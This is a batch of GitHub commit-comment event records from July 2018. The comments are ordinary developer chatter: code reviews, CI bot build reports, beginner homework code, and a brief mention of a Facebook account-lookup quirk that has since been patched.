{"id":"7934450168","type":"CommitCommentEvent","actor":{"login":"forax"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29634771,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-08T19:22:28Z","updated_at":"2018-07-08T19:22:28Z","author_association":"OWNER","body":"If we take a look to the other plugins, like compiler, it lets you either use the module conf or directly specifies the list of files you want to compile. But here, it seems there is no way to specify several files you want to test.\r\n\r\nNow if i understand JUnit5 correctly the preferred way to select a subset of the tests is to use @Tag, so the tester plugins should support includeTags/excludeTags like Maven does [1].\r\n\r\n[1] https://junit.org/junit5/docs/current/user-guide/#running-tests-build-maven-filter-tags"}},"created_at":"2018-07-08T19:22:28Z"}
{"id":"7934458642","type":"CommitCommentEvent","actor":{"login":"mhagmajer"},"repo":{"name":"moskwajacek/rr-newsletter-mid-1"},"payload":{"comment":{"id":29634785,"position":null,"line":null,"path":null,"commit_id":"211437421bd7ee103647b46731b4eb2722b6f446","created_at":"2018-07-08T19:28:39Z","updated_at":"2018-07-08T19:28:39Z","author_association":"NONE","body":"Looks good! 👍 "}},"created_at":"2018-07-08T19:28:39Z"}
{"id":"7934461863","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29634790,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-08T19:30:55Z","updated_at":"2018-07-08T19:30:55Z","author_association":"NONE","body":"A lot of time forfeits by noobpwnftw machine, maybe smth is wrong?"}},"created_at":"2018-07-08T19:30:55Z"}
{"id":"7934462170","type":"CommitCommentEvent","actor":{"login":"alekseyspjsb"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29634791,"position":null,"line":null,"path":null,"commit_id":"6f8eac35576de578a6b2c2d81c4e5ca9f8ffbbd8","created_at":"2018-07-08T19:31:08Z","updated_at":"2018-07-08T19:31:08Z","author_association":"OWNER","body":"выполнил домашнее задание по уроку 6"}},"created_at":"2018-07-08T19:31:08Z"}
{"id":"7934462802","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29634792,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T19:31:35Z","updated_at":"2018-07-08T19:31:35Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2306 of 2306 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-08T19:31:35Z"}
{"id":"7934464743","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29634799,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T19:33:01Z","updated_at":"2018-07-08T19:33:01Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T19:33:01Z"}
{"id":"7934465619","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29634802,"position":null,"line":null,"path":null,"commit_id":"f2b161e90d8700c19d92258103c43db6fa426ed6","created_at":"2018-07-08T19:33:42Z","updated_at":"2018-07-08T19:33:42Z","author_association":"MEMBER","body":"@fichtner will do, but still trying to solve an issue with the internal validations."}},"created_at":"2018-07-08T19:33:42Z"}
{"id":"7934466612","type":"CommitCommentEvent","actor":{"login":"Mintnix"},"repo":{"name":"Mintnix/testrepo"},"payload":{"comment":{"id":29634803,"position":4,"line":4,"path":".src/FMain.form","commit_id":"20ee863f3bd91e05abc073d523ab6af63f565910","created_at":"2018-07-08T19:34:26Z","updated_at":"2018-07-08T19:34:26Z","author_association":"OWNER","body":"Box scaliert\r\n"}},"created_at":"2018-07-08T19:34:26Z"}
{"id":"7934467189","type":"CommitCommentEvent","actor":{"login":"s0md3v"},"repo":{"name":"s0md3v/infinity"},"payload":{"comment":{"id":29634804,"position":null,"line":null,"path":null,"commit_id":"7f20dcdf49cabd5584ea9c46f5c817df27901302","created_at":"2018-07-08T19:34:51Z","updated_at":"2018-07-08T19:34:51Z","author_association":"OWNER","body":"It was possible to find profile names by phone numbers using the forget password feature.\r\nI reported it to facebook and their team told me that its not qualified as a bug so I made a tool for it and guess what? They patched it a month later."}},"created_at":"2018-07-08T19:34:51Z"}
{"id":"7934467829","type":"CommitCommentEvent","actor":{"login":"mtytel"},"repo":{"name":"mtytel/helm"},"payload":{"comment":{"id":29634805,"position":null,"line":null,"path":null,"commit_id":"0454059b9508dc81815048d5ce402e996f09f9fc","created_at":"2018-07-08T19:35:16Z","updated_at":"2018-07-08T19:35:16Z","author_association":"OWNER","body":"Ah hmmm. Are you building the LV2 plugin?\r\nI think I accidentally removed that.. Probably should have pushed this to a development branch."}},"created_at":"2018-07-08T19:35:16Z"}
{"id":"7934468657","type":"CommitCommentEvent","actor":{"login":"esgariot88"},"repo":{"name":"esgariot88/Python_lessons_basic"},"payload":{"comment":{"id":29634807,"position":11,"line":10,"path":"lesson01/home_work/hw01_easy.py","commit_id":"55ab7bc4384394abb026f08e1dd24fed310d5740","created_at":"2018-07-08T19:35:50Z","updated_at":"2018-07-08T19:35:50Z","author_association":"OWNER","body":"Greeting = \"Привет,Мир!\"\r\nprint(Greeting)\r\n\r\nGreeting = \"Привет,Мир питона!\"\r\nprint(Greeting)\r\n\r\na=10\r\nb=20\r\nc=30\r\n\r\nprint(a, b, c)\r\n"}},"created_at":"2018-07-08T19:35:50Z"}
{"id":"7934470191","type":"CommitCommentEvent","actor":{"login":"s0md3v"},"repo":{"name":"s0md3v/infinity"},"payload":{"comment":{"id":29634809,"position":null,"line":null,"path":null,"commit_id":"7f20dcdf49cabd5584ea9c46f5c817df27901302","created_at":"2018-07-08T19:36:50Z","updated_at":"2018-07-08T19:36:50Z","author_association":"OWNER","body":"What makes this tool unusual?\r\nWell first of all they changed the html layout so the regex doesn't work anymore. Also, if a user has applied proper privacy settings, the forget password will return just initials i.e. `S...... M.....`"}},"created_at":"2018-07-08T19:36:50Z"}
{"id":"7934470304","type":"CommitCommentEvent","actor":{"login":"AppallingFiend"},"repo":{"name":"AppallingFiend/MyProfile"},"payload":{"comment":{"id":29634810,"position":1,"line":1,"path":"try.py","commit_id":"7825ee35d2e4de7eb0c68df00df3f1a1cd262e02","created_at":"2018-07-08T19:36:53Z","updated_at":"2018-07-08T19:36:53Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-08T19:36:53Z"}
{"id":"7934471040","type":"CommitCommentEvent","actor":{"login":"esgariot88"},"repo":{"name":"esgariot88/Python_lessons_basic"},"payload":{"comment":{"id":29634811,"position":2,"line":2,"path":"lesson01/home_work/hw01_easy.py","commit_id":"55ab7bc4384394abb026f08e1dd24fed310d5740","created_at":"2018-07-08T19:37:23Z","updated_at":"2018-07-08T19:37:23Z","author_association":"OWNER","body":"Савченко Александр Владимирович"}},"created_at":"2018-07-08T19:37:23Z"}
{"id":"7934472714","type":"CommitCommentEvent","actor":{"login":"esgariot88"},"repo":{"name":"esgariot88/Python_lessons_basic"},"payload":{"comment":{"id":29634816,"position":21,"line":20,"path":"lesson01/home_work/hw01_easy.py","commit_id":"55ab7bc4384394abb026f08e1dd24fed310d5740","created_at":"2018-07-08T19:38:36Z","updated_at":"2018-07-08T19:38:36Z","author_association":"OWNER","body":"action = int(input(\"Введите число:\"))\r\n\r\nprint(action +2)"}},"created_at":"2018-07-08T19:38:36Z"}
{"id":"7934473963","type":"CommitCommentEvent","actor":{"login":"esgariot88"},"repo":{"name":"esgariot88/Python_lessons_basic"},"payload":{"comment":{"id":29634819,"position":25,"line":24,"path":"lesson01/home_work/hw01_easy.py","commit_id":"55ab7bc4384394abb026f08e1dd24fed310d5740","created_at":"2018-07-08T19:39:32Z","updated_at":"2018-07-08T19:39:32Z","author_association":"OWNER","body":"ge_limit = 18\r\nage=int(input(\"Введите ваш возраст:\"))\r\nif age == age_limit:\r\n    print(\"Доступ разрешен\")\r\nif age != age_limit:\r\n    print(\"Доступ запрещен\""}},"created_at":"2018-07-08T19:39:32Z"}
{"id":"7934476208","type":"CommitCommentEvent","actor":{"login":"esgariot88"},"repo":{"name":"esgariot88/Python_lessons_basic"},"payload":{"comment":{"id":29634821,"position":7,"line":12,"path":"lesson01/home_work/hw01_normal.py","commit_id":"55ab7bc4384394abb026f08e1dd24fed310d5740","created_at":"2018-07-08T19:41:09Z","updated_at":"2018-07-08T19:41:09Z","author_association":"OWNER","body":"while True:\r\n    Number = int(input(\"Ввведите число:\"))\r\n\r\n    if Number < 10 and Number > 0:\r\n         print(\"Условия выполнены\")\r\n         print(Number ** 2)\r\n         break\r\n\r\n    else:\r\n         print(\"Условия не выполнены.Введите число больше 0,но меньше 10.\")"}},"created_at":"2018-07-08T19:41:09Z"}
{"id":"7934477525","type":"CommitCommentEvent","actor":{"login":"esgariot88"},"repo":{"name":"esgariot88/Python_lessons_basic"},"payload":{"comment":{"id":29634823,"position":15,"line":20,"path":"lesson01/home_work/hw01_normal.py","commit_id":"55ab7bc4384394abb026f08e1dd24fed310d5740","created_at":"2018-07-08T19:42:05Z","updated_at":"2018-07-08T19:42:05Z","author_association":"OWNER","body":"Number_1 = 10\r\nNumber_2 = 20\r\n\r\nNumber_1 = int(input(\"Введите исходное значение N_1:\"))\r\nNumber_2 = int(input(\"Введите исходное значение N_2:\"))\r\n\r\nif Number_1 ==10:\r\n   Number_1=20\r\n   print(\"N_1=\" + str(Number_1))\r\n\r\n\r\nelse:\r\n    print(\"Введите исходное значение\")\r\n\r\nif Number_2 ==20:\r\n   Number_2=10\r\n   print(\"N_2=\" + str(Number_2))\r\nelse:\r\n        print(\"Введите сходное значение\")"}},"created_at":"2018-07-08T19:42:05Z"}
{"id":"7934478222","type":"CommitCommentEvent","actor":{"login":"rolf42-strategy"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29634824,"position":null,"line":null,"path":null,"commit_id":"f3a2aa5a9af637022a89989851d2b423c0fe3dea","created_at":"2018-07-08T19:42:33Z","updated_at":"2018-07-08T19:42:33Z","author_association":"COLLABORATOR","body":"You didn't, don't worry."}},"created_at":"2018-07-08T19:42:33Z"}
{"id":"7934479258","type":"CommitCommentEvent","actor":{"login":"oleg61"},"repo":{"name":"oleg61/python_lern"},"payload":{"comment":{"id":29634826,"position":null,"line":null,"path":null,"commit_id":"5d85eda9c8d5c28b0bacf40b4a20fbd644e011b0","created_at":"2018-07-08T19:43:17Z","updated_at":"2018-07-08T19:43:17Z","author_association":"OWNER","body":"Запишите букву 'A' (латинскую, заглавную) 100 раз подряд. Сдайте на проверку программу, которая выводит эту строчку (только буквы, без кавычек или пробелов)."}},"created_at":"2018-07-08T19:43:17Z"}
{"id":"7934481460","type":"CommitCommentEvent","actor":{"login":"Oxid15"},"repo":{"name":"Oxid15/Perceptron"},"payload":{"comment":{"id":29634828,"position":null,"line":null,"path":null,"commit_id":"d4d63a5ba76fccac8dfb8868325763af879b0d76","created_at":"2018-07-08T19:44:31Z","updated_at":"2018-07-08T19:44:31Z","author_association":"OWNER","body":"есть нарушения памяти, но вычисления происходят корректно"}},"created_at":"2018-07-08T19:44:31Z"}
{"id":"7934486021","type":"CommitCommentEvent","actor":{"login":"FR86"},"repo":{"name":"dlang/ci"},"payload":{"comment":{"id":29634837,"position":4,"line":331,"path":"vars/runPipeline.groovy","commit_id":"b8d82c7ba18469ddfbcec82962661599896c7d18","created_at":"2018-07-08T19:47:39Z","updated_at":"2018-07-08T19:47:39Z","author_association":"NONE","body":"Typo here? shouldn't it be ldc-developers?"}},"created_at":"2018-07-08T19:47:39Z"}
{"id":"7934488681","type":"CommitCommentEvent","actor":{"login":"guysoft"},"repo":{"name":"mtytel/helm"},"payload":{"comment":{"id":29634839,"position":null,"line":null,"path":null,"commit_id":"0454059b9508dc81815048d5ce402e996f09f9fc","created_at":"2018-07-08T19:49:37Z","updated_at":"2018-07-08T19:49:37Z","author_association":"NONE","body":"Yep, see https://github.com/zynthian/zynthian-sys/issues/61"}},"created_at":"2018-07-08T19:49:37Z"}
{"id":"7934489853","type":"CommitCommentEvent","actor":{"login":"Moycakes"},"repo":{"name":"EvHaus/youtube-hide-watched"},"payload":{"comment":{"id":29634840,"position":null,"line":null,"path":null,"commit_id":"c71298c1c0c92b5db2e834ff901567044d9694ae","created_at":"2018-07-08T19:50:24Z","updated_at":"2018-07-08T19:50:24Z","author_association":"NONE","body":"There is a bug with this commit.  I stuffed this patch at the bottom of the current version on master, under the assumption that in the non-grid mode it'd hide the empty rows, but it just hid all videos regardless of watched status.\r\n\r\nHowever it did work just fine in grid mode."}},"created_at":"2018-07-08T19:50:24Z"}
{"id":"7934491513","type":"CommitCommentEvent","actor":{"login":"breversa"},"repo":{"name":"beetbox/beets"},"payload":{"comment":{"id":29634842,"position":null,"line":null,"path":null,"commit_id":"3d9fba399f40655c4dec3670f71396bad6d18e7a","created_at":"2018-07-08T19:51:38Z","updated_at":"2018-07-08T19:51:38Z","author_association":"NONE","body":"I did… and it works ! :-D"}},"created_at":"2018-07-08T19:51:38Z"}
{"id":"7934492240","type":"CommitCommentEvent","actor":{"login":"TovarasulTony"},"repo":{"name":"TovarasulTony/PlayingWithGit"},"payload":{"comment":{"id":29634844,"position":null,"line":null,"path":null,"commit_id":"22587bddf9029fc14baf28275b95483f78f7f7eb","created_at":"2018-07-08T19:52:12Z","updated_at":"2018-07-08T19:52:12Z","author_association":"OWNER","body":"Asa da. Baiat muncitor. Keep up the good work ;)"}},"created_at":"2018-07-08T19:52:12Z"}
{"id":"7934492779","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"ry/deno"},"payload":{"comment":{"id":29634845,"position":9,"line":18,"path":"js/main.ts","commit_id":"8a17db8266dad0325d04762a27c4f61446d26d2e","created_at":"2018-07-08T19:52:36Z","updated_at":"2018-07-08T19:52:36Z","author_association":"OWNER","body":"Random comment: It’d be nice to be able to compile our checks like this in the optimized build."}},"created_at":"2018-07-08T19:52:36Z"}
{"id":"7934494331","type":"CommitCommentEvent","actor":{"login":"nastysia"},"repo":{"name":"nastysia/ConsoleApplicationHomework"},"payload":{"comment":{"id":29634847,"position":5,"line":22,"path":"ConsoleApplicationHomework/Task/Task17.swift","commit_id":"25d19e358557bf3d53114ac3e0edc92bf4d33a5a","created_at":"2018-07-08T19:53:53Z","updated_at":"2018-07-08T19:53:53Z","author_association":"OWNER","body":"Пробувала так, якась фігня виходить\r\n\r\nlet x = -b / a\r\n\r\n\r\n\r\n    if  a == 0 {\r\n\r\n        print(\"Не існує розв'язків.\")\r\n\r\n        if b == 0 {\r\n\r\n            print(\"Безліч розв'язків.\")\r\n\r\n        }\r\n\r\n    }\r\n\r\n    print(x)\r\n\r\n}\r\n\r\n\r\nOn Sun, Jul 8, 2018 at 10:10 PM, Yaroslav Kupyak <notifications@github.com>\r\nwrote:\r\n\r\n> Спробуй уникнути дублювання коду a == 0\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/nastysia/ConsoleApplicationHomework/commit/25d19e358557bf3d53114ac3e0edc92bf4d33a5a#commitcomment-29634735>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AmPmqn7dpDPrg6CBrQ1ZAtLKbjR3yXt3ks5uEllCgaJpZM4VG1cG>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-08T19:53:53Z"}
{"id":"7934497071","type":"CommitCommentEvent","actor":{"login":"mpbelhorn"},"repo":{"name":"robertdfrench/sturdy-octo-couscous"},"payload":{"comment":{"id":29634850,"position":null,"line":null,"path":null,"commit_id":"1d44813c43540c3515e387c139380b255f528b4b","created_at":"2018-07-08T19:55:54Z","updated_at":"2018-07-08T19:55:54Z","author_association":"NONE","body":"Nice. So this will prompt users when they hit the button to enter the key and set the necessary heroku config variables?"}},"created_at":"2018-07-08T19:55:54Z"}
{"id":"7934498312","type":"CommitCommentEvent","actor":{"login":"InfusOnWoW"},"repo":{"name":"emptyrivers/WeakAuras2"},"payload":{"comment":{"id":29634853,"position":3,"line":135,"path":"WeakAurasOptions/OptionsFrames/OptionsFrame.lua","commit_id":"3db6f99c2864b8145c70d41c5ca91d5b4b7f7a2d","created_at":"2018-07-08T19:56:54Z","updated_at":"2018-07-08T19:56:54Z","author_association":"NONE","body":"This line should be reverted too."}},"created_at":"2018-07-08T19:56:54Z"}
{"id":"7934501719","type":"CommitCommentEvent","actor":{"login":"dhaumann"},"repo":{"name":"KDE/syntax-highlighting"},"payload":{"comment":{"id":29634858,"position":null,"line":null,"path":null,"commit_id":"75014f85e93a5279483f695d79edb76f0e458194","created_at":"2018-07-08T19:59:42Z","updated_at":"2018-07-08T19:59:42Z","author_association":"CONTRIBUTOR","body":"Either you post a patch on phabricator.kde.org, or I can take care of integrating this if you want."}},"created_at":"2018-07-08T19:59:42Z"}
{"id":"7933212196","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631617,"position":4,"line":4,"path":"find_determinant.h","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T02:00:43Z","updated_at":"2018-07-08T02:00:43Z","author_association":"NONE","body":"This includes should go to the `find_determinant.c`. And this file is good for putting reusable things"}},"created_at":"2018-07-08T02:00:43Z"}
{"id":"7933218339","type":"CommitCommentEvent","actor":{"login":"bong88macao"},"repo":{"name":"sakari/hgit"},"payload":{"comment":{"id":29631624,"position":null,"line":null,"path":null,"commit_id":"16659667133f052d3397f46fb979bc8473fb8909","created_at":"2018-07-08T02:07:37Z","updated_at":"2018-07-08T02:07:37Z","author_association":"NONE","body":" thank i'm sorry\r\n"}},"created_at":"2018-07-08T02:07:37Z"}
{"id":"7933229050","type":"CommitCommentEvent","actor":{"login":"chencong1993"},"repo":{"name":"chencong1993/cncg"},"payload":{"comment":{"id":29631638,"position":null,"line":null,"path":null,"commit_id":"337a84603db82f530de77a39ff17beb2963fd33d","created_at":"2018-07-08T02:20:09Z","updated_at":"2018-07-08T02:20:09Z","author_association":"OWNER","body":"# cncg\r\n测试git库\r\n这是一个项目练习库\r\n"}},"created_at":"2018-07-08T02:20:09Z"}
{"id":"7933236658","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29631665,"position":null,"line":null,"path":null,"commit_id":"c22208cb94cc4e95ff22aabdd814c0c60ad18bd1","created_at":"2018-07-08T02:28:47Z","updated_at":"2018-07-08T02:28:47Z","author_association":"OWNER","body":"I just found out ^\\ sends SIGQUIT, which causes a core dump. Useful if I want to reproduce something."}},"created_at":"2018-07-08T02:28:47Z"}
{"id":"7933236768","type":"CommitCommentEvent","actor":{"login":"NovaRain"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29631666,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-08T02:28:55Z","updated_at":"2018-07-08T02:28:55Z","author_association":"COLLABORATOR","body":"It's not about optimization but unexpected behavior. inventory_redraw(1) should redraw target's inventory, not player's. With your logic, inventory_redraw(1) has dual purposes:\r\n1. redraws player's inventory in the inventory/use screens, works exactly the same as inventory_redraw(0).\r\n2. redraws target's inventory (but not player's) in loot/barter screens.\r\n\r\nI'd consider this an unexpected behavior rather than a \"feature\", unless that's how you designed it to work (but in your original description you only said 1 is for target's), Also it's not like we're programming in pre-Pentium era, how many cycles your logic can save?"}},"created_at":"2018-07-08T02:28:55Z"}
{"id":"7933239180","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29631677,"position":null,"line":null,"path":null,"commit_id":"059e76ef80fe2e26d0110e2c95c3eb3cab1f3ec4","created_at":"2018-07-08T02:31:22Z","updated_at":"2018-07-08T02:31:22Z","author_association":"OWNER","body":"I was an idiot and forgot about the thing I could've used to find the seed in a core dump all along"}},"created_at":"2018-07-08T02:31:22Z"}
{"id":"7933242682","type":"CommitCommentEvent","actor":{"login":"veoh1989"},"repo":{"name":"TMUND/react-pdf-collab"},"payload":{"comment":{"id":29631683,"position":null,"line":null,"path":null,"commit_id":"82e0063bad4eaa80c89e8f1155f83d9fe29841e9","created_at":"2018-07-08T02:35:09Z","updated_at":"2018-07-08T02:35:09Z","author_association":"COLLABORATOR","body":"This is <Popup />, not <Tip /> 😃 "}},"created_at":"2018-07-08T02:35:09Z"}
{"id":"7933243103","type":"CommitCommentEvent","actor":{"login":"Clark-Kent87"},"repo":{"name":"ClementC/pyMAP-DP"},"payload":{"comment":{"id":29631686,"position":null,"line":null,"path":null,"commit_id":"aa94bc68aca858a8385e2dc019238108cd3ee93b","created_at":"2018-07-08T02:35:34Z","updated_at":"2018-07-08T02:35:34Z","author_association":"NONE","body":"- \"packageUrl\": \"\",\r\n    \"remoteManifestUrl\": \"\",\r\n    \"version\": \"341\",\r\n    \"engineVersion\": \"V3.3\",\r\n    \"assets\": {\r\n        \"res/.nomedia\": {\r\n            \"md5\": \"2212294583\",\r\n            \"size\": 1\r\n        },\r\n        \"res/Data/Common/Default.png\": {\r\n            \"md5\": \"2462046092\",\r\n            \"size\": 1788\r\n        },\r\n        \"res/Data/Common/Fireworks.plist\": {\r\n            \"md5\": \"2186539235\",\r\n            \"size\": 20820\r\n        },\r\n        \"res/Data/Common/Fireworks.png\": {\r\n            \"md5\": \"3971258440\",\r\n            \"size\": 4476076\r\n        },\r\n        \"res/Data/Common/GameBonus1.csb\": {\r\n            \"md5\": \"1255595327\",\r\n            \"size\": 117860\r\n        },\r\n        \"res/Data/Common/GameBonus1.plist\": {\r\n            \"md5\": \"3810845178\",\r\n            \"size\": 345932\r\n        },\r\n        \"res/Data/Common/GameBonus1.png\": {\r\n            \"md5\": \"909507629\",\r\n            \"size\": 2431216\r\n        },\r\n        \"res/Data/Common/GameBonus2.csb\": {\r\n            \"md5\": \"4059324278\",\r\n            \"size\": 217388\r\n        },\r\n        \"res/Data/Common/GameBonus2.plist\": {\r\n            \"md5\": \"3193781949\",\r\n            \"size\": 580796\r\n        },\r\n        \"res/Data/Common/GameBonus2.png\": {\r\n            \"md5\": \"1344018345\",\r\n            \"size\": 2348260\r\n        },\r\n        \"res/Data/Common/GameMenuBtn.plist\": {\r\n            \"md5\": \"313729462\",\r\n            \"size\": 1696\r\n        },\r\n        \"res/Data/Common/GameMenuBtn.png\": {\r\n            \"md5\": \"805753620\",\r\n            \"size\": 4540\r\n        },\r\n        \"res/Data/Common/HelpP"}},"created_at":"2018-07-08T02:35:34Z"}
{"id":"7933247350","type":"CommitCommentEvent","actor":{"login":"julianhyde"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":29631695,"position":14,"line":299,"path":"core/src/main/java/org/apache/calcite/rel/rules/LoptOptimizeJoinRule.java","commit_id":"3fe96727479a2beca3a867bde3b5ae25a601e657","created_at":"2018-07-08T02:40:17Z","updated_at":"2018-07-08T02:40:17Z","author_association":"OWNER","body":"As of Java 8, `list.toArray(new T[0])` is as efficient as `list.toArray(new T[list.size()])`, and as it is simpler, is now the preferred pattern; see https://shipilev.net/blog/2016/arrays-wisdom-ancients/."}},"created_at":"2018-07-08T02:40:17Z"}
{"id":"7933251250","type":"CommitCommentEvent","actor":{"login":"julianhyde"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":29631700,"position":12,"line":104,"path":"core/src/main/java/org/apache/calcite/rel/metadata/JaninoRelMetadataProvider.java","commit_id":"3fe96727479a2beca3a867bde3b5ae25a601e657","created_at":"2018-07-08T02:44:46Z","updated_at":"2018-07-08T02:44:46Z","author_association":"OWNER","body":"\"unchecked\" is about generic types, whereas \"Nonnull\" is about nulls. I removed a \"//noinspection unchecked\" comment, so `@SuppressWarnings(\"unchecked\")` is just another way of making the same check.\r\n\r\n`load3` is a generic method (parameterized with the kind of metadata, M), whereas the cache mixes all handlers together in the same cache, regardless of type."}},"created_at":"2018-07-08T02:44:46Z"}
{"id":"7933251467","type":"CommitCommentEvent","actor":{"login":"fbifido"},"repo":{"name":"mmarable/BlogFiles"},"payload":{"comment":{"id":29631703,"position":null,"line":null,"path":null,"commit_id":"04c32d17fb430622b5959bb729fcdf7aad3ca472","created_at":"2018-07-08T02:45:03Z","updated_at":"2018-07-08T02:45:03Z","author_association":"NONE","body":"Can this work for Servers"}},"created_at":"2018-07-08T02:45:03Z"}
{"id":"7933261333","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"malarozi/iOS-11.1.2-15B202-Jailbreak"},"payload":{"comment":{"id":29631723,"position":null,"line":null,"path":null,"commit_id":"e94b964b6e907d731e62da3e980fa57812892238","created_at":"2018-07-08T02:56:08Z","updated_at":"2018-07-08T02:56:08Z","author_association":"OWNER","body":"e94b964b6e907d731e62da3e980fa57812892238"}},"created_at":"2018-07-08T02:56:08Z"}
{"id":"7933263718","type":"CommitCommentEvent","actor":{"login":"lxj1091681536"},"repo":{"name":"aleks-djuric/hand-raised-detector"},"payload":{"comment":{"id":29631726,"position":null,"line":null,"path":null,"commit_id":"cd604429092f3271712471eb64a8d37bbf451a13","created_at":"2018-07-08T02:58:45Z","updated_at":"2018-07-08T02:58:45Z","author_association":"NONE","body":"Hello，Can you provide a model for use here? We would like to refer to it, thank you very much.\r\nhand_raised_detection = app.models.get('### hand-raised-detector')"}},"created_at":"2018-07-08T02:58:45Z"}
{"id":"7933264422","type":"CommitCommentEvent","actor":{"login":"sunnyabc789"},"repo":{"name":"sunnyabc789/back-stage-management"},"payload":{"comment":{"id":29631727,"position":null,"line":null,"path":null,"commit_id":"f3b0ef62836cdf2685e413c746735a44c88dcf96","created_at":"2018-07-08T02:59:35Z","updated_at":"2018-07-08T02:59:35Z","author_association":"OWNER","body":"运行mongo数据库\r\n\r\n输入mongoimport -d worktime -c yonghus ./init/用户模拟数据.txt --drop\r\n插入模拟数据\r\n\r\n安装依赖后 运行app.js 访问3000端口即可运行项目"}},"created_at":"2018-07-08T02:59:35Z"}
{"id":"7933264636","type":"CommitCommentEvent","actor":{"login":"DanielValdivieso"},"repo":{"name":"DanielValdivieso/CLI-App"},"payload":{"comment":{"id":29631728,"position":3,"line":3,"path":"README.md","commit_id":"48850cab3588b551c907b8dca4c92f89abc5cd05","created_at":"2018-07-08T02:59:50Z","updated_at":"2018-07-08T02:59:50Z","author_association":"OWNER","body":"Link"}},"created_at":"2018-07-08T02:59:50Z"}
{"id":"7933264752","type":"CommitCommentEvent","actor":{"login":"qmega"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":29631729,"position":null,"line":null,"path":null,"commit_id":"945303a92ecac73ba430b9eac0f10279cd95a32a","created_at":"2018-07-08T02:59:59Z","updated_at":"2018-07-08T02:59:59Z","author_association":"CONTRIBUTOR","body":"@avih #5890 / #5937, if you haven't seen them already."}},"created_at":"2018-07-08T02:59:59Z"}
{"id":"7934503979","type":"CommitCommentEvent","actor":{"login":"jerith666"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29634865,"position":null,"line":null,"path":null,"commit_id":"8ea70531de391a66fc0c7d445340ca7c6e21c892","created_at":"2018-07-08T20:01:06Z","updated_at":"2018-07-08T20:01:06Z","author_association":"CONTRIBUTOR","body":"Tried locally, and building amazonka and my local package that uses it still works, so yeah, seems like it's obsolete.  I'll need to do a bit more testing next time I have access to the relevant machines, though, which'll be a couple of weeks.\r\n\r\nIn the mean time, the revert is at https://github.com/jerith666/nixpkgs/tree/amazonka-revert (commit https://github.com/jerith666/nixpkgs/commit/5269f526947f11f7bb46984b9d6849ed73e8a4fa)."}},"created_at":"2018-07-08T20:01:06Z"}
